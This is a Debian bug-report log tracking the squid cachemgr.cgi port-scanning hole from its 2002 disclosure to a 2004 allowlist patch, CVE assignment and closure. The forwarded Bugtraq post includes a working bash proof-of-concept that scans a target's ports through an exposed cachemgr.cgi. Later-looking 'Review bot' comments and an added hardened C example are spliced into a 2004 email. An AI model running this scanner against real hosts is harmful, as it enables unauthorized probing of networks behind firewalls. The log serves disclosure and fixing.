Debian Bug report logs - #133131
cachemgr.cgi allows remote users to scan arbitrary hosts and ports

Package: squid-cgi; Maintainer for squid-cgi is Luigi Gangitano <luigi@debian.org>; Source for squid-cgi is src:squid3.

Reported by: Matt Zimmerman <mdz@debian.org>

Date: Sat, 9 Feb 2002 20:18:01 UTC

Severity: important

Tags: patch, potato, security, woody

Done: Luigi Gangitano <luigi@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, Miquel van Smoorenburg <miquels@cistron.nl>, squid@packages.qa.debian.org:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, Miquel van Smoorenburg <miquels@cistron.nl>, squid@packages.qa.debian.org.

Message #5 received at submit@bugs.debian.org:

From: Matt Zimmerman <mdz@debian.org>
To: submit@bugs.debian.org
Subject: cachemgr.cgi allows remote users to scan arbitrary hosts and ports
Date: Sat, 9 Feb 2002 15:14:12 -0500
Package: squid-cgi
Severity: important
Tags: sid woody potato security

Debian's cachemgr.cgi is installed and enabled by default, and publicly
accessible.  The version in sid displays a prominent warning message with
debconf, but this does little to correct the problem.  The potato version
only displays this note from postinst:

squid-cgi:   IMPORTANT: Read the documentation in
squid-cgi:   /usr/share/doc/squid-cgi/README.cachemgr.gz

which is easily missed.  cachemgr.cgi should be disabled or crippled by
default, so that the administrator must voluntarily open this hole, or set
up access control.  It looks like Red Hat worked around this issue
(RHSA-1999-025) by moving cachemgr.cgi out of cgi-bin so that the
administrator must work to enable it.  This is not as much of an issue in
the Debian squid package, as cachemgr.cgi is in a separate package, but this
should still be fixed.

A better way to do this for Debian might be to have cachemgr.cgi read a
simple configuration file in /etc.  It would contain a list of hosts and
ports that the cache manager would allow users to connect to, and could
default to localhost:3128.  This would allow the script to work with a local
Debian packaged squid by default, and provide a secure way to use it with
other caches without allowing arbitrary port scanning.

If this sounds good to you, I can provide a patch if that would help.

----- Forwarded message from Francisco S?a Mu?oz <fsaa@ip6seguridad.com> -----

Date: Mon, 4 Feb 2002 17:43:36 +0100
From: Francisco S?a Mu?oz <fsaa@ip6seguridad.com>
To: <bugtraq@securityfocus.com>
Subject: cachemgr.cgi (squid 2.3STABLE4)

]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated: Linux Redhat 6.2
                                 Squid 2.3STABLE4
                                 Apache 1.3.12

]-* [IP6] The problem...

Due to a misconfiguration of Apache and Squid it is possible to use the
cachemgr.cgi shipped with Squid to scan hosts behind the corporate firewall.

...also we can gather a lot of information about the navigation,
configuration...

...also there is a lot of code with bad programming habits!

There is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache
#
# Usage: miscachemgr host_vuln host_to_scan end_port
#
#   host_vuln    web server exposing /cgi-bin/cachemgr.cgi
#   host_to_scan target the CGI is asked to connect to
#   end_port     scan ports 1 .. end_port-1
#
# Concept: Jacobo Van Leeuwen & Francisco S?a Mu?oz
# Coded by Francisco S?a Mu?oz
# IP6 [Logic Control]

if [ $# -ne 3 ]; then
    echo "Usage: $0 host_vuln host_to_scan end_port" >&2
    exit 1
fi

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

# One log file per probed port: the CGI's connect error text versus a
# cache manager menu (or a timeout) reveals whether the port is open.
mkdir -p "from_$1_to_$2"

while [ "$PORT" -lt "$3" ]; do
    lynx -dump "http://$1$ONE$2$TWO$PORT$THREE" > "from_$1_to_$2/$PORT.log" 2>&1
    PORT=$((PORT + 1))
done
--- End nasty Code ---

]-* [IP6] Solution

Deny access, configure it!

]-* [IP6] Thanks

Thanks to all IP6 staff for the good feeling.

Signed,

--
Francisco S?a Mu?oz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from
rfp)
--

]-* [IP6] EOF

----- End forwarded message -----
----- Forwarded message from Francisco S?a Mu?oz <fsaa@ip6seguridad.com> -----

Date: Wed, 6 Feb 2002 10:26:23 +0100
From: Francisco S?a Mu?oz <fsaa@ip6seguridad.com>
To: <bugtraq@securityfocus.com>
Subject: cachemgr.cgi (2.3STABLE4) (and 2)

Stuart Moore from SecurityTracker tells me:

http://www.redhat.com/support/errata/RHSA-1999-025.html

Yes, is the same thing. The only new thing that I have contributed to
is the script to demonstrate the vulnerability. (blah...)

Signed,

--
Francisco S?a Mu?oz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special"
--

PS: my English is poor, I know!

----- End forwarded message -----

-- 
 - mdz



Severity set to `grave'. Request was from Adrian Bunk <bunk@fs.tum.de> to control@bugs.debian.org.

Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list.

Message #12 received at 133131@bugs.debian.org:

From: Luigi Gangitano <luigi@debian.org>
To: Matt Zimmerman <mdz@debian.org>
Cc: 133131@bugs.debian.org, Adrian Bunk <bunk@fs.tum.de>
Subject: Bug #133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Fri, 24 Sep 2004 01:20:28 +0200
Hi Matt,
Adrian correctly changed severity for this bug to grave. I want to
resolve this issue and get it to sarge (and maybe to woody-proposed-
updates).

I have two options:
- Provide /etc/apache/conf.d/squid-cgi.conf with localhost access only
to squidmgr.cgi

- Patch squidmgr.c to check for a configuration file limiting hosts
scanned as you suggested in your original report, proposing a patch.
This should also get to upstream, so future versions won't be affected.

What would you suggest? And, if you find the second one more
appropriate, could you provide the patch you offered?

Thanks,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26

Information forwarded to debian-bugs-dist@lists.debian.org, Luigi Gangitano <luigi@debian.org>:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Luigi Gangitano <luigi@debian.org>.

Message #17 received at 133131@bugs.debian.org:

From: Matt Zimmerman <mdz@debian.org>
To: Luigi Gangitano <luigi@debian.org>, 133131@bugs.debian.org
Subject: Re: Bug#133131: Bug #133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Thu, 23 Sep 2004 16:58:12 -0700
On Fri, Sep 24, 2004 at 01:20:28AM +0200, Luigi Gangitano wrote:

> Adrian correctly changed severity for this bug to grave. I want to
> resolve this issue and get it to sarge (and maybe to woody-proposed-
> updates).
> 
> I have two options:
> - Provide /etc/apache/conf.d/squid-cgi.conf with localhost access only
> to squidmgr.cgi
> 
> - Patch squidmgr.c to check for a configuration file limiting hosts
> scanned as you suggested in your original report, proposing a patch.
> This should also get to upstream, so future versions won't be affected.
> 
> What would you suggest? And, if you find the second one more
> appropriate, could you provide the patch you offered?

The CGI is useful with any web server, right?  If so, the
non-Apache-specific solution is probably better.  Unfortunately, I am
incredibly busy with work right now and cannot provide a patch for you.

-- 
 - mdz



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list.

Message #22 received at 133131@bugs.debian.org:

From: Luigi Gangitano <luigi@debian.org>
To: Matt Zimmerman <mdz@debian.org>, 133131@bugs.debian.org
Cc: Adrian Bunk <bunk@fs.tum.de>, control@bugs.debian.org
Subject: Re: Bug#133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Sun, 03 Oct 2004 14:24:22 +0200
tags 133131 patch
thanks

Hi,
I've developed a small patch that adds a configuration
(/etc/squid/cachemgr.conf) file which contains allowed targets in this
form:

hostname:port

Can you please review it? If it's ok I will include it and push squid to
sarge.

Thanks,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26
[cachemgr.diff (text/x-patch, attachment)]

Tags added: patch. Request was from Luigi Gangitano <luigi@debian.org> to control@bugs.debian.org.

Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list.

Message #29 received at 133131@bugs.debian.org:

From: Luigi Gangitano <luigi@debian.org>
To: Matt Zimmerman <mdz@debian.org>, 133131@bugs.debian.org
Cc: control@bugs.debian.org
Subject: Re: Bug#133131: Bug #133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Wed, 06 Oct 2004 20:44:42 +0200
tags 133131 - sid
severity 133131 important
thanks

I fixed this bug in squid_2.5.6-9. Still open for woody and potato.

Lowering severity to allow the fix in sarge.

Rationale: bug is fixed in sid, so not RC anymore, but still important
for woody.

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26

Tags removed: sid. Request was from Luigi Gangitano <luigi@debian.org> to control@bugs.debian.org.

Severity set to `important'. Request was from Luigi Gangitano <luigi@debian.org> to control@bugs.debian.org.

Information forwarded to debian-bugs-dist@lists.debian.org, Luigi Gangitano <luigi@debian.org>:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Martin Schulze <joey@infodrom.org>:
Extra info received and forwarded to list. Copy sent to Luigi Gangitano <luigi@debian.org>.

Message #38 received at 133131@bugs.debian.org:

From: Martin Schulze <joey@infodrom.org>
To: Luigi Gangitano <luigi@debian.org>
Cc: Debian Security Team <team@security.debian.org>, 133131@bugs.debian.org
Subject: Re: Bug #133131, fix for woody
Date: Thu, 7 Oct 2004 10:17:46 +0200
Luigi Gangitano wrote:
> Hi all,
> I'm in the process of uploading a new version of squid that fixes this
> security bug with the attached diff for sid and sarge. I would like to
> fix woody too. Since there's no difference in source code, the same
> patch should apply.

Good.

> I don't know if an advisory is needed, but I'd like to add it to the
> next stable revision.

I guess, an advisory is needed.  I assign CAN-2004-0913 to this
vulnerability.  Please mention it in the changelog.

> --- cachemgr.c.orig	2004-10-01 23:48:34.000000000 +0200
> +++ cachemgr.c	2004-10-02 01:48:34.000000000 +0200
> @@ -160,4 +160,5 @@
>  static time_t now;
>  static struct in_addr no_addr;
> +static const char *configfile = "/etc/squid/cachemgr.conf";
>  
>  /*
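Review bot: the configuration path is hard-coded here as a string literal in cachemgr.c. If this patch is meant to go upstream, as the question about upstream later in this message implies, the path should come from the build's sysconfdir (a compile-time define passed in from the Makefile, with "/etc/squid/cachemgr.conf" as the Debian value), otherwise every build with a different prefix silently fails to find the file and takes the missing-file branch.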
> @@ -181,4 +182,7 @@
>  static const char *make_auth_header(const cachemgr_request * req);
>  
> +static int check_target_acl(const char *hostname, int port);
> +
>  
>  static const char *
> @@ -535,4 +539,9 @@
>  	return 0;
>      }
> +	if ((check_target_acl(req->hostname, req->port)) > 0) {
> +	snprintf(buf, 1024, "acl: target not allowed\n");
> +	error_html(buf);
> +	return 1;
> +	}
>      if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
>  	snprintf(buf, 1024, "socket: %s\n", xstrerror());
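Review bot: the check runs on req->hostname exactly as supplied in the query string, before any address resolution (the socket is only created in the line that follows), so the allowlist can only ever match the literal spelling of the target; "localhost" and "127.0.0.1" are distinct entries and each spelling an administrator wants to permit must be listed, which the conffile comment should say. Two smaller points: the inserted block is indented one tab deeper than the surrounding 4-space code, and "> 0" as the "denied" convention reads more clearly as "!= 0" with a comment, or as a function that returns non-zero for "allowed".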
> @@ -752,2 +761,42 @@
>      return buf;
>  }
> +
> +static int 
> +check_target_acl(const char *hostname, int port)
> +{
> +    char config_line[BUFSIZ];
> +	char *token = NULL;
> +	int i;
> +    FILE *fp = NULL;
> +	if ((fp = fopen(configfile, "r")) == NULL) {
> +		if ((strcmp(hostname, CACHEMGR_HOSTNAME) != 0) || port != CACHE_HTTP_PORT)

I'd rather phrase this the other way round, so the logic behind it is
more obvious:

		if ((strcmp(hostname, CACHEMGR_HOSTNAME) == 0) && port == CACHE_HTTP_PORT)
			return 0;
		else
			return 1;

When the last return statement is moved down (see below), the else
part can be left out.

> +	} else {
> +		while (fgets(config_line, BUFSIZ, fp)) {
> +    		if ((token = strchr(config_line, '\n')))
> +        		*token = '\0';
> +    		if (config_line[0] == '#')
> +        		continue;
> +    		if (config_line[0] == '\0')
> +        		continue;

Wrong indentation above (after the while loop).

> +			if ((token = strtok(config_line, ":")) == NULL)
> +				continue;
> +			if (strcmp(token, hostname) != 0) {
> +				continue;
> +			} else {
> +				if ((token = strtok(NULL, ":")) == NULL)
> +					continue;
> +				if (sscanf(token, "%d", &i) != 1)
> +					continue;
> +				if (i != port)
> +					continue;
> +				else
> +					return 0;

I'd turn this around as well to make the logic behind it more obvious:

				if (i == port)
					return 0;
				else
					continue;

That way you can also leave out the else part, btw., which I would do
as well.

> +			}
> +		}	
> +		return 1;	
> +	}
> +	
> +}
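Review bot: fp is never fclose()d, neither on the early "return 0" inside the loop nor on the "return 1" after it; add fclose(fp) before each return, or record the result, break out of the loop and return after a single fclose. A second silent-failure case: only '\n' is stripped, so a file saved with CRLF endings or with trailing blanks (e.g. "localhost:3128\r") makes every entry fail the strcmp and the CGI denies all targets with no hint why; trim trailing whitespace before the strtok. Likewise strtok with ":" hands back "localhost " for an entry written as "localhost : 3128", which will never equal hostname.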

I'd move that "return 1" one block below, so it's the end of the
function.  From the current data path this doesn't matter, but for
future extensions or reviews it may be more obvious.

In general the solution looks good.

Have you spoken with upstream yet?  What do they think?  It would be
bad if Debian would invent a solution and upstream would implement
another solution, so that Debian packages would be converted.

We also need an empty (and registered) conffile that contains
something like:

	# cachemgr.conf - Configuration of the squid cachemgr.cgi
	#
	# Simply place pairs of hostnames and ports that the cachemgr
	# should be permitted to connect to in lines of their own.
	#
	# foo.bar.org:3128


Regards,

	Joey

PS: Did you receive my mail wrt. CAN-2004-0832?

-- 
It's time to close the windows.

Please always Cc to me when replying to me on the lists.
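A hardened version of the hostname:port allowlist that Luigi describes above and that Joey's sample conffile documents, written as an added example for this page; it is neither the patch in this bug nor squid's own code. It treats '#' as a comment anywhere on a line, tolerates CRLF endings and blanks around the colon, rejects entries with a missing or malformed port, always closes the file, and falls back to allowing only the default target when the file is absent, as the Debian fix does. DEFAULT_HOST/DEFAULT_PORT stand in for squid's CACHEMGR_HOSTNAME/CACHE_HTTP_PORT, the sample configuration is constructed here, and /nonexistent/cachemgr.conf is just an unreadable path.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-ins for squid's CACHEMGR_HOSTNAME / CACHE_HTTP_PORT (assumed values). */
#define DEFAULT_HOST "localhost"
#define DEFAULT_PORT 3128

/* Strip leading blanks and trailing blanks/CR/LF in place; return the start. */
static char *trim(char *s)
{
    char *end;
    while (isspace((unsigned char)*s))
        s++;
    end = s + strlen(s);
    while (end > s && isspace((unsigned char)end[-1]))
        *--end = '\0';
    return s;
}

/* Return 1 if "host:port" is listed in the stream, 0 otherwise.
 * One "hostname:port" per line, '#' starts a comment, blank lines are ignored.
 * The name is compared literally, as cachemgr.cgi receives it from the query
 * string: "localhost" and "127.0.0.1" are different entries. */
int target_allowed_in(FILE *fp, const char *host, int port)
{
    char line[BUFSIZ];
    while (fgets(line, sizeof line, fp)) {
        char *hash = strchr(line, '#');
        char *colon, *entry, *endp;
        long p;
        if (hash)
            *hash = '\0';              /* drop the comment part */
        entry = trim(line);
        if (*entry == '\0')
            continue;                  /* blank or comment-only line */
        colon = strrchr(entry, ':');
        if (!colon)
            continue;                  /* malformed: no port, never matches */
        *colon = '\0';
        p = strtol(colon + 1, &endp, 10);
        if (endp == colon + 1 || *trim(endp) != '\0' || p < 1 || p > 65535)
            continue;                  /* malformed port, never matches */
        if (strcmp(trim(entry), host) == 0 && p == port)
            return 1;
    }
    return 0;
}

/* File-backed check: a missing file permits only the default target, and the
 * stream is closed on every path. */
int target_allowed(const char *path, const char *host, int port)
{
    FILE *fp = fopen(path, "r");
    int ok;
    if (!fp)
        return strcmp(host, DEFAULT_HOST) == 0 && port == DEFAULT_PORT;
    ok = target_allowed_in(fp, host, port);
    fclose(fp);
    return ok;
}

/* Constructed sample cachemgr.conf exercising the edge cases above. */
static const char SAMPLE_CONF[] =
    "# cachemgr.conf - allowed targets\r\n"     /* CRLF-terminated comment */
    "localhost:3128\r\n"                        /* CRLF-terminated entry */
    "  proxy.example.org : 8080   # internal\n" /* blanks and trailing comment */
    "bogus-no-port\n"                           /* malformed: no port */
    "evil.example.org:notaport\n"               /* malformed: bad port */
    "\n";

/* Check one target against the constructed sample via an ISO C tmpfile. */
int sample_allows(const char *host, int port)
{
    FILE *fp = tmpfile();
    int ok;
    if (!fp)
        return -1;
    fputs(SAMPLE_CONF, fp);
    rewind(fp);
    ok = target_allowed_in(fp, host, port);
    fclose(fp);
    return ok;
}

int main(void)
{
    const char *hosts[] = { "localhost", "127.0.0.1", "proxy.example.org",
                            "evil.example.org", "bogus-no-port" };
    int ports[] = { 3128, 3128, 8080, 25, 80 };
    size_t i;
    for (i = 0; i < sizeof hosts / sizeof hosts[0]; i++)
        printf("%s:%d -> %s\n", hosts[i], ports[i],
               sample_allows(hosts[i], ports[i]) ? "allowed" : "denied");
    return 0;
}
```

Malformed lines are skipped rather than treated as errors so that one typo cannot accidentally open every target; the price is that a typo also cannot be noticed from the CGI's behaviour, so a startup warning on skipped lines would be the next improvement.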



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list.

Message #43 received at 133131@bugs.debian.org:

From: Luigi Gangitano <luigi@debian.org>
To: Martin Schulze <joey@infodrom.org>, 133131@bugs.debian.org
Cc: Debian Security Team <team@security.debian.org>
Subject: Re: Bug#133131: Bug #133131, fix for woody
Date: Thu, 07 Oct 2004 19:07:43 +0200
On Thu, 07-10-2004 at 10:17 +0200, Martin Schulze wrote:
> I guess, an advisory is needed.  I assign CAN-2004-0913 to this
> vulnerability.  Please mention it in the changelog.

Done. Let me know if you want a woody package with that fix.

> In general the solution looks good.

Thanks, I've just applied your suggestions.

> Have you spoken with upstream yet?  What do they think?  It would be
> bad if Debian would invent a solution and upstream would implement
> another solution, so that Debian packages would be converted.

They suggested that solution. I sent back the patch for review but
received no answer. I'm going to file a wishlist bug in the upstream
bugzilla with the patch.

> We also need an empty (and registered) conffile that contains
> something like:
> 
> 	# cachemgr.conf - Configuration of the squid cachemgr.cgi
> 	#
> 	# Simply place pairs of hostnames and ports that the cachemgr
> 	# should be permitted to connect to in lines of their own.
> 	#
> 	# foo.bar.org:3128

Already done. I just allowed localhost:3128 which is default in
squid.conf.


> PS: Did you receive my mail wrt. CAN-2004-0832?

I did and added it to the changelog.

Thanks,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26


Information forwarded to debian-bugs-dist@lists.debian.org, Luigi Gangitano <luigi@debian.org>:
Bug#133131; Package squid-cgi.

Acknowledgement sent to Martin Schulze <joey@infodrom.org>:
Extra info received and forwarded to list. Copy sent to Luigi Gangitano <luigi@debian.org>.

Message #48 received at 133131@bugs.debian.org:

From: Martin Schulze <joey@infodrom.org>
To: Luigi Gangitano <luigi@debian.org>
Cc: 133131@bugs.debian.org, Debian Security Team <team@security.debian.org>
Subject: Re: Bug#133131: Bug #133131, fix for woody
Date: Thu, 7 Oct 2004 19:20:58 +0200
Luigi Gangitano wrote:
> On Thu, 07-10-2004 at 10:17 +0200, Martin Schulze wrote:
> > I guess, an advisory is needed.  I assign CAN-2004-0913 to this
> > vulnerability.  Please mention it in the changelog.
> 
> Done. Let me know if you want a woody package with that fix.

I'd be glad to receive a new source package.  Please set the distribution
to 'stable-security' and the priority to 'high'.  Otherwise, the updated
patch would be fine as well, then I'll build the source package.

> > Have you spoken with upstream yet?  What do they think?  It would be
> > bad if Debian would invent a solution and upstream would implement
> > another solution, so that Debian packages would be converted.
> 
> They suggested that solution. I sent back the patch for review but
> received no answer. I'm going to file a wishlist bug in the upstream
> bugzilla with the patch.

Good, so that solution won't be nullified with the next upstream
release.

Regards,

	Joey

-- 
It's time to close the windows.

Please always Cc to me when replying to me on the lists.



Reply sent to Luigi Gangitano <luigi@debian.org>:
You have taken responsibility.

Notification sent to Matt Zimmerman <mdz@debian.org>:
Bug acknowledged by developer.

Message #53 received at 133131-done@bugs.debian.org:

From: Luigi Gangitano <luigi@debian.org>
To: 133131-done@bugs.debian.org
Subject: Closing Bug #133131: cachemgr.cgi allows remote users to scan arbitrary hosts and ports
Date: Sat, 30 Oct 2004 20:00:59 +0200
This bug has been fixed in 2.5.6-10 for sarge/sid and in 2.4.6-2woody4
for woody (see DSA 576-1).

Regards,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 23:58:47 2014; Machine Name: buxtehude.debian.org
